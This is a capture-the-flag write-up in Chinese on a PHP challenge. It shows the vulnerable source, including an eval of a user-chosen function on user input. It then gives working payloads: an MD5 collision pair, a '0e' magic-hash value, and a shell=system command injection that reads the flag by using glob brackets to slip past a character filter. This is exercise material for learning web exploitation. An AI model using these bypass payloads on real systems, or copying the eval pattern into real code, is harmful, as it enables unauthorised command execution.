[NSSCTF Round#16 Basic]RCE但是没有完全RCE

RCE但是没有完全RCE wp

题目代码:

第一关

 <?php
error_reporting(0);
highlight_file(__file__);
include('level2.php');
if (isset($_GET['md5_1']) && isset($_GET['md5_2'])) {
    if ((string)$_GET['md5_1'] !== (string)$_GET['md5_2'] && md5($_GET['md5_1']) === md5($_GET['md5_2'])) {
        if (isset($_POST['md5_3'])&&md5($_POST['md5_3']) == md5($_POST['md5_3'])) {
            echo $level2;
        } else {
            echo "您!!!!!那么现在阁下又该如何应对呢";
        }
    } else {
        echo "还在用传统方法????";
    }
} else {
    echo "来做做熟悉的MD5~";
}
来做做熟悉的MD5~
第一个 md5 强比较,使用 payload :
md5_1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&md5_2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
第二个 MD5 加密后弱比较等于自身,使用 payload:
# POST 传参
md5_3=0e215962017

返回结果:

在这里插入图片描述

提示:3z_RC3.php

第二关

访问 3z_RC3.php :

 <?php
error_reporting(0);
highlight_file(__FILE__);
$shell = $_POST['shell'];
$cmd = $_GET['cmd'];
if(preg_match('/f|l|a|g|\*|\?/i',$cmd)){
    die("Hacker!!!!!!!!");
}
eval($shell($cmd)); 

温馨提示:linux 中可以使用 dir 命令代替 ls 来查看当前目录下的所有文件。

因此 POST 传参 shell=system ,同时 GET 传参 cmd=dir / ,即可查看根目录下所有文件。返回结果:

在这里插入图片描述

因为字母 a,l 被过滤了,所以 cat ,tac,head,tail,less 命令都用不了,但是 more 命令可以用。

flag 每个字母都被过滤了,* 和 ? 也用不了,可以用 [] 来匹配单个字符,如 [a-z] 匹配的是 a-z 之间的某个字符。

中括号正则匹配是根据ASCII码值来分辨先后顺序的。

因此 GET 传参

cmd=more /[b-z][b-z][^-b][b-z]

返回结果:

在这里插入图片描述

  • 18
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值